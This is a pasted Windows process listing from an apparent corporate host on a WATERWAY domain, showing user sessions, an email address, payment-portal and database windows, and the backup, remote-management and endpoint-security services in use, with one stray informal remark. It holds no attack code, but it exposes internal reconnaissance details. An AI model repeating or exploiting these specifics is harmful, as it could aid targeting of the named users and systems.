svchost.exe 25704 Services 0 4,896 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
notepad.exe 2892 Console 1 10,996 K Running WATERWAY\mharper 0:00:08 *Untitled - Notepad
SettingSyncHost.exe 15248 Console 1 5,636 K Running WATERWAY\mharper 0:00:00 N/A
svchost.exe 23560 Console 1 4,408 K Unknown WATERWAY\mharper 0:00:00 N/A
svchost.exe 6036 Services 0 5,840 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:30 N/A
NCentralRDViewer.exe 2440 Console 1 16,612 K Running WATERWAY\mharper 0:01:03 SolarWinds Take Control
svchost.exe 17712 Services 0 8,284 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
SystemSettingsBroker.exe 10444 Console 1 8,000 K Unknown WATERWAY\mharper 0:00:00 N/A
Microsoft.Photos.exe 29200 Console 1 68,756 K Running WATERWAY\mharper 0:00:41 OleMainThreadWndName
RuntimeBroker.exe 28796 Console 1 28,488 K Running WATERWAY\mharper 0:00:57 N/A
Calculator.exe 21148 Console 1 500 K Running WATERWAY\mharper 0:00:00 Calculator
Video.UI.exe 30660 Console 1 12,768 K Running WATERWAY\mharper 0:00:00 N/A
RuntimeBroker.exe 24116 Console 1 7,544 K Unknown WATERWAY\mharper 0:00:00 N/A
ctfmon.exe 26676 Console 1 17,252 K Running WATERWAY\mharper 0:00:11 N/A
MailStoreHome.exe 8108 Console 1 432,560 K Running WATERWAY\mharper 7:17:28 Progress View
Ssms.exe 19396 Console 1,297,696 K Running WATERWAY\mharper 0:58:09 SQLQuery2.sql - Unit 43.Gilbarco (sa (60))* - Microsoft SQL Server Manag
unsecapp.exe 31732 Console 1 13,220 K Running WATERWAY\mharper 0:01:05 OleMainThreadWndName
firefox.exe 5428 Console 1 429,628 K Running WATERWAY\mharper 0:03:14 Authorize.NET - Login - Merchant Interface - Mozilla Firefox
firefox.exe 25284 Console 1 83,832 K Running WATERWAY\mharper 0:00:03 N/A
firefox.exe 27856 Console 1 71,808 K Running WATERWAY\mharper 0:00:01 OleMainThreadWndName
firefox.exe 9332 Console 1 423,712 K Running WATERWAY\mharper 0:08:55 OleMainThreadWndName
nplastpass.exe 16856 Console 1 9,912 K Not Responding WATERWAY\mharper 0:00:00 OleMainThreadWndName
conhost.exe 20348 Console 1 6,384 K Unknown WATERWAY\mharper 0:00:00 N/A
firefox.exe 23236 Console 1 130,108 K Running WATERWAY\mharper 0:00:05 OleMainThreadWndName
firefox.exe 24704 Console 1 144,296 K Running WATERWAY\mharper 0:00:13 OleMainThreadWndName
firefox.exe 6720 Console 1 40,112 K Not Responding WATERWAY\mharper 0:00:01 OleMainThreadWndName
firefox.exe 2592 Console 1 34,500 K Not Responding WATERWAY\mharper 0:00:00 OleMainThreadWndName
YourPhone.exe 19940 Console 1 28,036 K Running WATERWAY\mharper 0:00:00 N/A
RuntimeBroker.exe 21212 Console 1 11,620 K Unknown WATERWAY\mharper 0:00:00 N/A
taskhostw.exe 22120 Console 1 19,008 K Running WATERWAY\mharper 0:00:00 Task Host Window
mstsc.exe 28548 Console 1 15,928 K Unknown NT AUTHORITY\SYSTEM 0:00:06 N/A
OfficeClickToRun.exe 25400 Services 0 72,136 K Unknown NT AUTHORITY\SYSTEM 0:00:17 N/A
AppVShNotify.exe 18780 Services 0 8,668 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
AppVShNotify.exe 7548 Console 1 9,424 K Unknown WATERWAY\mharper 0:00:00 N/A
SearchIndexer.exe 16388 Services 0 171,936 K Unknown NT AUTHORITY\SYSTEM 0:01:30 N/A
UserInterface.exe 22152 Console 1 34,048 K Running WATERWAY\mharper 0:00:00 Email Change Request - v2.0.0.12
mstsc.exe 18104 Console 1 8,880 K Unknown WATERWAY\mharper 0:00:15 N/A
WmiPrvSE.exe 20708 Services 0 14,132 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 18532 Services 0 7,532 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 25384 Services 0 21,744 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
TabTip.exe 8460 Console 1 17,892 K Running WATERWAY\mharper 0:00:00 G
svchost.exe 22944 Services 0 9,132 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
OUTLOOK.EXE 31768 Console 1 286,900 K Running WATERWAY\mharper 0:00:49 Orders - mharper@waterway.com - Outlook
SearchProtocolHost.exe 26768 Console 1 8,984 K Running WATERWAY\mharper 0:00:50 HardwareMonitorWindow
powershell.exe 23332 Services 0 74,120 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
conhost.exe 26448 Services 0 12,088 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
powershell.exe 30680 Services 0 58,904 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
conhost.exe 25292 Services 0 11,508 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
SearchFilterHost.exe 17528 Services 0 28,072 K Unknown NT AUTHORITY\SYSTEM 0:00:13 N/A
svchost.exe 27460 Services 0 13,416 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
SDUpdate.exe 15416 Services 0 20,268 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 29440 Services 0 8,720 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
cmd.exe 27000 Console 1 6,088 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
conhost.exe 13852 Console 1 13,148 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
tasklist.exe 18052 Console 1 11,924 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A


``was just now''.
chrome.exe 53128 Console 4 89,820 K Unknown WATERWAY\blauer 0:00:07 N/A
chrome.exe 50200 Console 4 86,080 K Unknown WATERWAY\blauer 0:00:01 N/A
chrome.exe 55936 Console 4 167,528 K Unknown WATERWAY\blauer 0:00:06 N/A
Chrome isn't on the process sheet, I'll close my browser for 24 hours.
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 Services 0 8 K Unknown NT AUTHORITY\SYSTEM 4076:03:56 N/A
System 4 Services 0 2,260 K Unknown N/A 55:26:16 N/A
Secure System 88 Services 0 40,516 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
Registry 152 Services 0 88,892 K Unknown NT AUTHORITY\SYSTEM 0:00:32 N/A
smss.exe 712 Services 0 1,004 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 1104 Services 0 3,312 K Unknown NT AUTHORITY\SYSTEM 0:02:42 N/A
wininit.exe 1204 Services 0 3,740 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
services.exe 1280 Services 0 14,816 K Unknown NT AUTHORITY\SYSTEM 2:25:58 N/A
LsaIso.exe 1300 Services 0 2,456 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
lsass.exe 1308 Services 0 28,232 K Unknown NT AUTHORITY\SYSTEM 1:13:13 N/A
svchost.exe 1424 Services 0 2,904 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 1448 Services 0 48,528 K Unknown NT AUTHORITY\SYSTEM 0:18:52 N/A
fontdrvhost.exe 1476 Services 0 1,960 K Unknown Font Driver Host\UMFD-0 0:00:17 N/A
WUDFHost.exe 1540 Services 0 3,672 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
svchost.exe 1580 Services 0 25,648 K Unknown NT AUTHORITY/NETWORK SERVICE 0:18:06 N/A
svchost.exe 1672 Services 0 7,448 K Unknown NT AUTHORITY\SYSTEM 0:02:10 N/A
svchost.exe 1928 Services 0 14,368 K Unknown NT AUTHORITY/NETWORK SERVICE 0:37:14 N/A
svchost.exe 1964 Services 0 5,024 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:46 N/A
svchost.exe 1972 Services 0 4,984 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 1984 Services 0 4,800 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:08 N/A
svchost.exe 1992 Services 0 11,448 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:29 N/A
svchost.exe 2016 Services 0 4,908 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:03 N/A
svchost.exe 2024 Services 0 4,976 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:04 N/A
svchost.exe 796 Services 0 3,372 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 2092 Services 0 5,964 K Unknown NT AUTHORITY/LOCAL SERVICE 0:01:41 N/A
svchost.exe 2140 Services 0 6,812 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 2148 Services 0 6,972 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:09 N/A
svchost.exe 2156 Services 0 8,616 K Unknown NT AUTHORITY/NETWORK SERVICE 0:16:36 N/A
svchost.exe 2288 Services 0 58,236 K Unknown NT AUTHORITY\LOCAL SERVICE 0:04:33 N/A
svchost.exe 2380 Services 0 3,564 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 2520 Services 0 39,696 K Unknown NT AUTHORITY/LOCAL SERVICE 0:01:48 N/A
svchost.exe 2640 Services 0 11,220 K Unknown NT AUTHORITY/NETWORK SERVICE 0:01:25 N/A
svchost.exe 2668 Services 0 8,840 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
svchost.exe 2856 Services 0 9,548 K Unknown NT AUTHORITY\LOCAL SERVICE 0:02:47 N/A
NVDisplay.Container.exe 2876 Services 0 7,592 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
svchost.exe 2932 Services 0 12,412 K Unknown NT AUTHORITY\SYSTEM 0:01:10 N/A
svchost.exe 2952 Services 0 7,604 K Unknown NT AUTHORITY\SYSTEM 0:00:31 N/A
svchost.exe 3032 Services 0 6,944 K Unknown NT AUTHORITY\SYSTEM 0:00:14 N/A
svchost.exe 3068 Services 0 8,116 K Unknown NT AUTHORITY\SYSTEM 0:35:17 N/A
svchost.exe 2208 Services 0 5,476 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:03 N/A
svchost.exe 2076 Services 0 3,752 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
svchost.exe 3188 Services 0 5,924 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
Memory Compression 3220 Services 0 913,128 K Unknown NT AUTHORITY\SYSTEM 4:11:03 N/A
svchost.exe 3260 Services 0 6,420 K Unknown NT AUTHORITY\SYSTEM 0:00:15 N/A
dasHost.exe 3288 Services 0 13,892 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:07 N/A
svchost.exe 3320 Services 0 27,668 K Unknown NT AUTHORITY\SYSTEM 1:18:04 N/A
svchost.exe 3328 Services 0 5,784 K Unknown NT AUTHORITY\SYSTEM 0:02:09 N/A
svchost.exe 3336 Services 0 8,928 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:14 N/A
svchost.exe 3412 Services 0 6,660 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:21 N/A
svchost.exe 3632 Services 0 4,808 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 3660 Services 0 7,512 K Unknown NT AUTHORITY\SYSTEM 0:00:28 N/A
svchost.exe 3688 Services 0 9,432 K Unknown NT AUTHORITY\SYSTEM 0:00:08 N/A
svchost.exe 3816 Services 0 17,668 K Unknown NT AUTHORITY\SYSTEM 0:05:11 N/A
svchost.exe 3868 Services 0 14,044 K Unknown NT AUTHORITY\SYSTEM 0:00:20 N/A
svchost.exe 4040 Services 0 5,172 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 3400 Services 0 4,964 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:11 N/A
svchost.exe 4112 Services 0 5,604 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 4392 Services 0 11,808 K Unknown NT AUTHORITY\LOCAL SERVICE 0:04:22 N/A
svchost.exe 4508 Services 0 6,556 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:04 N/A
svchost.exe 4516 Services 0 4,268 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:05 N/A
svchost.exe 4560 Services 0 4,440 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 4664 Services 0 6,656 K Unknown NT AUTHORITY\SYSTEM 0:00:57 N/A
svchost.exe 4712 Services 0 5,716 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:06 N/A
spoolsv.exe 4796 Services 0 29,976 K Unknown NT AUTHORITY\SYSTEM 0:02:06 N/A
svchost.exe 5568 Services 0 4,864 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 5584 Services 0 11,352 K Unknown NT AUTHORITY/NETWORK SERVICE 0:01:01 N/A
svchost.exe 5592 Services 0 30,584 K Unknown NT AUTHORITY\SYSTEM 0:05:15 N/A
svchost.exe 5600 Services 0 4,160 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:04 N/A
BASupSrvcUpdater.exe 5608 Services 0 11,564 K Unknown NT AUTHORITY\SYSTEM 0:06:10 N/A
BASupSrvc.exe 5616 Services 0 24,980 K Unknown NT AUTHORITY\SYSTEM 0:18:30 N/A
svchost.exe 5560 Services 0 3,372 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
bdredline.exe 5628 Services 0 7,808 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
BtwRSupportService.exe 5636 Services 0 4,160 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 5644 Services 0 5,040 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
EPIntegrationService.exe 5660 Services 0 13,624 K Unknown NT AUTHORITY\SYSTEM 0:06:34 N/A
EPUpdateService.exe 5668 Services 0 9,536 K Unknown NT AUTHORITY\SYSTEM 0:03:42 N/A
3CXWMRemoteControlSvc.exe 5676 Services 0 3,492 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
armsvc.exe 5688 Services 0 4,076 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
EPProtectedService.exe 5696 Services 0 6,148 K Unknown NT AUTHORITY\SYSTEM 0:01:18 N/A
svchost.exe 5716 Services 0 46,712 K Unknown NT AUTHORITY\LOCAL SERVICE 0:16:32 N/A
AGSService.exe 5724 Services 0 6,508 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
AGMService.exe 5736 Services 0 7,496 K Unknown NT AUTHORITY\SYSTEM 0:00:08 N/A
AdobeUpdateService.exe 5760 Services 0 4,300 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
EPSecurityService.exe 5784 Services 0 206,880 K Unknown NT AUTHORITY\SYSTEM 4:22:41 N/A
MTSCRA.WEBAPI.HostService 5800 Services 0 4,284 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 5836 Services 0 5,964 K Unknown NT AUTHORITY\SYSTEM 0:09:33 N/A
sqlservr.exe 6000 Services 0 265,128 K Unknown NT AUTHORITY\SYSTEM 6:41:36 N/A
svchost.exe 6036 Services 0 3,308 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 6064 Services 0 3,356 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
svchost.exe 6124 Services 0 3,220 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
RedGate.Client.Service.ex 6236 Services 0 16,064 K Unknown NT AUTHORITY\SYSTEM 0:00:23 N/A
RtkAudUService64.exe 6244 Services 0 5,260 K Unknown NT AUTHORITY\SYSTEM 0:00:14 N/A
svchost.exe 6256 Services 0 3,404 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
sqlbrowser.exe 6264 Services 0 1,864 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 6272 Services 0 7,764 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:13 N/A
sqlwriter.exe 6280 Services 0 4,248 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mysqld.exe 6316 Services 0 4,372 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:01 N/A
vss-service-x64.exe 6448 Services 0 3,920 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 6528 Services 0 6,996 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 6540 Services 0 16,048 K Unknown NT AUTHORITY\SYSTEM 0:00:27 N/A
vmms.exe 6548 Services 0 14,092 K Unknown NT AUTHORITY\SYSTEM 0:00:18 N/A
VeeamFilesysVssSvc.exe 6608 Services 0 7,660 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 6616 Services 0 3,348 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
agent.exe 6632 Services 0 422,776 K Unknown NT AUTHORITY\SYSTEM 0:30:15 N/A
Veeam.Backup.Agent.Config 6648 Services 0 13,388 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
wgsslvpnsrc.exe 6664 Services 0 2,472 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
VeeamHvIntegrationSvc.exe 6700 Services 0 6,912 K Unknown NT AUTHORITY\SYSTEM 0:21:15 N/A
VeeamTransportSvc.exe 6744 Services 0 4,232 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 6772 Services 0 4,932 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:14 N/A
VeeamDeploymentSvc.exe 6780 Services 0 7,888 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
VeeamNFSSvc.exe 6800 Services 0 2,916 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
CptService.exe 6900 Services 0 2,648 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 7380 Services 0 8,080 K Unknown NT AUTHORITY\SYSTEM 0:00:14 N/A
sqlceip.exe 7728 Services 0 42,668 K Unknown NT SERVICE\SQLTELEMETRY$VEEAMSQL2016 0:00:57 N/A
sqlservr.exe 7744 Services 0 129,812 K Unknown NT SERVICE\MSSQL$MSSQLSERVER01 11:15:43 N/A
sqlceip.exe 7752 Services 0 25,080 K Unknown NT SERVICE\SQLTELEMETRY$MSSQLSERVER01 0:00:36 N/A
WmiPrvSE.exe 8048 Services 0 74,680 K Unknown NT AUTHORITY\SYSTEM 1:16:17 N/A
Veeam.Guest.Interaction.P 8224 Services 0 2,684 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
conhost.exe 8296 Services 0 3,216 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
mysqld.exe 8432 Services 0 22,736 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:04 N/A
conhost.exe 8496 Services 0 3,296 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
unsecapp.exe 8740 Services 0 4,644 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
dasHost.exe 8776 Services 0 5,012 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:00 N/A
MsDtsSrvr.exe 8300 Services 0 5,424 K Unknown NT SERVICE\MsDtsServer150 0:00:02 N/A
sqlceip.exe 8928 Services 0 15,660 K Unknown NT SERVICE\SSISTELEMETRY150 0:00:56 N/A
sqlceip.exe 9352 Services 0 21,304 K Unknown NT SERVICE\SQLTELEMETRY 0:01:21 N/A
svchost.exe 10072 Services 0 14,716 K Unknown NT AUTHORITY\SYSTEM 0:00:11 N/A
svchost.exe 10156 Services 0 5,272 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:47 N/A
svchost.exe 10224 Services 0 4,792 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
vmcompute.exe 9444 Services 0 3,676 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
vds.exe 9520 Services 0 4,772 K Unknown NT AUTHORITY\SYSTEM 0:00:22 N/A
svchost.exe 10676 Services 0 8,248 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 10740 Services 0 5,244 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
NableSixtyFourBitManager.    11976 Services 0 37,732 K Unknown NT AUTHORITY\SYSTEM 1:09:12 N/A
conhost.exe 11996 Services 0 3,240 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
NableReactiveManagement.e 12032 Services 0 13,264 K Unknown NT AUTHORITY\SYSTEM 0:00:14 N/A
conhost.exe 12060 Services 0 3,240 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 12252 Services 0 11,924 K Unknown NT AUTHORITY\SYSTEM 0:00:18 N/A
svchost.exe 12472 Services 0 12,176 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:07 N/A
svchost.exe 13004 Services 0 8,556 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
WmiApSrv.exe 13836 Services 0 5,316 K Unknown NT AUTHORITY\SYSTEM 1:00:29 N/A
WmiPrvSE.exe 14268 Services 0 10,128 K Unknown NT AUTHORITY\LOCAL SERVICE 0:12:20 N/A
dllhost.exe 14084 Services 0 5,548 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
SolarWinds.MSP.CacheServi 15348 Services 0 18,160 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:27 N/A
SolarWinds.MSP.RpcServerS 15004 Services 0 17,172 K Unknown NT AUTHORITY\SYSTEM 0:00:44 N/A
svchost.exe 15148 Services 0 8,064 K Unknown NT AUTHORITY\SYSTEM 0:02:13 N/A
SecurityHealthService.exe 15288 Services 0 10,516 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
svchost.exe 15108 Services 0 4,684 K Unknown NT AUTHORITY\SYSTEM 0:00:12 N/A
ALEService.exe 9816 Services 0 407,844 K Unknown WATERWAY\blauer 70:01:27 N/A
SgrmBroker.exe 9408 Services 0 7,196 K Unknown NT AUTHORITY\SYSTEM 0:01:49 N/A
SolarWinds.MSP.PME.Agent.     5876 Services 0 6,548 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
Veeam.Backup.Service.exe 2396 Services 0 247,100 K Unknown NT AUTHORITY\SYSTEM 2:05:26 N/A
svchost.exe 6092 Services 0 15,396 K Unknown NT AUTHORITY\SYSTEM 0:02:16 N/A
svchost.exe 12000 Services 0 7,088 K Unknown NT AUTHORITY\SYSTEM 0:00:11 N/A
svchost.exe 5860 Services 0 7,572 K Unknown NT AUTHORITY\SYSTEM 0:00:21 N/A
svchost.exe 12188 Services 0 7,908 K Unknown NT AUTHORITY\SYSTEM 0:00:30 N/A
svchost.exe 15924 Services 0 12,608 K Unknown NT AUTHORITY\SYSTEM 0:00:17 N/A
svchost.exe 16128 Services 0 13,992 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:19 N/A
Veeam.Backup.BrokerServic 18892 Services 0 13,724 K Unknown NT AUTHORITY\SYSTEM 0:00:12 N/A
Veeam.Backup.UIServer.exe 18900 Services 0 33,232 K Unknown NT AUTHORITY\SYSTEM 0:37:33 N/A
Veeam.Backup.ExternalInfr 18936 Services 0 23,292 K Unknown NT AUTHORITY\SYSTEM 0:02:09 N/A
conhost.exe 18964 Services 0 3,848 K Unknown NT AUTHORITY\SYSTEM 0:00:07 N/A
Veeam.Backup.WmiServer.ex 19264 Services 0 19,032 K Unknown NT AUTHORITY\SYSTEM 0:00:41 N/A
conhost.exe 19168 Services 0 3,984 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
Veeam.Backup.CatalogDataS 19564 Services 0 19,716 K Unknown NT AUTHORITY\SYSTEM 0:00:23 N/A
Veeam.Backup.CloudService 20072 Services 0 44,108 K Unknown NT AUTHORITY\SYSTEM 0:03:00 N/A
Veeam.Backup.EnterpriseSe 20940 Services 0 33,344 K Unknown NT AUTHORITY\SYSTEM 0:04:29 N/A
Veeam.Backup.Enterprise.W 23216 Services 0 11,676 K Unknown NT AUTHORITY\SYSTEM 0:00:22 N/A
conhost.exe 23240 Services 0 3,868 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
Veeam.Backup.MountService 23360 Services 0 14,324 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
Veeam.Backup.Enterprise.R 23568 Services 0 26,500 K Unknown NT AUTHORITY\SYSTEM 0:00:24 N/A
AgentMaint.exe 24564 Services 0 12,792 K Unknown NT AUTHORITY\SYSTEM 0:00:08 N/A
svchost.exe 23004 Services 0 7,400 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
svchost.exe 15204 Services 0 6,776 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 24776 Services 0 4,812 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 28960 Services 0 5,196 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
NableAVDBridge.exe 28952 Services 0 22,096 K Unknown NT AUTHORITY\SYSTEM 0:00:29 N/A
conhost.exe 21064 Services 0 4,148 K Unknown NT AUTHORITY\SYSTEM 0:00:06 N/A
svchost.exe 27260 Services 0 10,112 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
svchost.exe 14916 Services 0 5,636 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:03 N/A
svchost.exe 36520 Services 0 5,004 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:08 N/A
WmiPrvSE.exe 39552 Services 0 65,268 K Unknown NT AUTHORITY\SYSTEM 0:35:33 N/A
WmiPrvSE.exe 29268 Services 0 8,568 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:17 N/A
dasHost.exe 10892 Services 0 3,064 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:00 N/A
svchost.exe 11904 Services 0 5,344 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
svchost.exe 15692 Services 0 7,080 K Unknown NT AUTHORITY\SYSTEM 0:00:06 N/A
svchost.exe 42980 Services 0 6,336 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
MAGNEFLEX.Host.Service.ex 39396 Services 0 4,424 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
OfficeClickToRun.exe 14996 Services 0 28,220 K Unknown NT AUTHORITY\SYSTEM 0:00:29 N/A
AppVShNotify.exe 38144 Services 0 4,184 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
SearchIndexer.exe 5856 Services 0 69,812 K Unknown NT AUTHORITY\SYSTEM 0:15:01 N/A
Agent.exe 19932 Services 0 8,836 K Unknown NT AUTHORITY\SYSTEM 0:20:34 N/A
csrss.exe 12116 Console 4 16,048 K Unknown NT AUTHORITY\SYSTEM 0:09:33 N/A
winlogon.exe 10220 Console 4 11,836 K Unknown NT AUTHORITY\SYSTEM 0:00:49 N/A
fontdrvhost.exe 32204 Console 4 12,192 K Unknown Font Driver Host\UMFD-4 0:00:33 N/A
dwm.exe 34156 Console 4 467,000 K Unknown Window Manager\DWM-4 1:41:19 N/A
EPConsole.exe 29256 Console 4 1,304 K Unknown WATERWAY\blauer 0:03:53 N/A
sihost.exe 17500 Console 4 27,328 K Unknown WATERWAY\blauer 0:01:51 N/A
svchost.exe 15560 Console 4 23,812 K Unknown WATERWAY\blauer 0:01:16 N/A
ipoint.exe 6732 Console 4 4,912 K Unknown WATERWAY\blauer 0:23:38 N/A
taskhostw.exe 9512 Console 4 19,988 K Unknown WATERWAY\blauer 0:00:25 N/A
itype.exe 24536 Console 4 436 K Unknown WATERWAY\blauer 0:03:43 N/A
MKCHelper.exe 10024 Console 4 1,292 K Unknown WATERWAY\blauer 0:00:00 N/A
explorer.exe 17792 Console 4 160,260 K Unknown WATERWAY\blauer 0:32:58 N/A
StartMenuExperienceHost.e 40684 Console 4 39,980 K Unknown WATERWAY\blauer 0:00:17 N/A
RuntimeBroker.exe 4344 Console 4 16,316 K Unknown WATERWAY\blauer 0:00:08 N/A
SearchUI.exe 20344 Console 4 69,704 K Unknown WATERWAY\blauer 0:01:54 N/A
RuntimeBroker.exe 38364 Console 4 37,628 K Unknown WATERWAY\blauer 0:01:00 N/A
dllhost.exe 21704 Console 4 9,400 K Unknown WATERWAY\blauer 0:00:02 N/A
TodoBackupService.exe 16464 Console 4 5,648 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
RuntimeBroker.exe 14764 Console 4 22,320 K Unknown WATERWAY\blauer 0:02:08 N/A
ApplicationFrameHost.exe 4496 Console 4 31,404 K Unknown WATERWAY\blauer 0:00:17 N/A
SecurityHealthSystray.exe 23016 Console 4 7,248 K Unknown WATERWAY\blauer 0:00:00 N/A
RtkAudUService64.exe 2944 Console 4 6,488 K Unknown WATERWAY\blauer 0:00:00 N/A
LogiOptions.exe 26908 Console 4 8,100 K Unknown WATERWAY\blauer 0:04:15 N/A
LogiOptionsMgr.exe 25572 Console 4 22,132 K Unknown WATERWAY\blauer 0:00:29 N/A
LogiOverlay.exe 41436 Console 4 38,956 K Unknown WATERWAY\blauer 0:03:44 N/A
OneDrive.exe 16416 Console 4 39,248 K Unknown WATERWAY\blauer 0:01:35 N/A
CCXProcess.exe 36108 Console 4 1,844 K Unknown WATERWAY\blauer 0:00:00 N/A
node.exe 26644 Console 4 57,200 K Unknown WATERWAY\blauer 0:30:33 N/A
conhost.exe 23400 Console 4 3,580 K Unknown WATERWAY\blauer 0:00:00 N/A
AdobeIPCBroker.exe 12072 Console 4 11,780 K Unknown WATERWAY\blauer 0:28:27 N/A
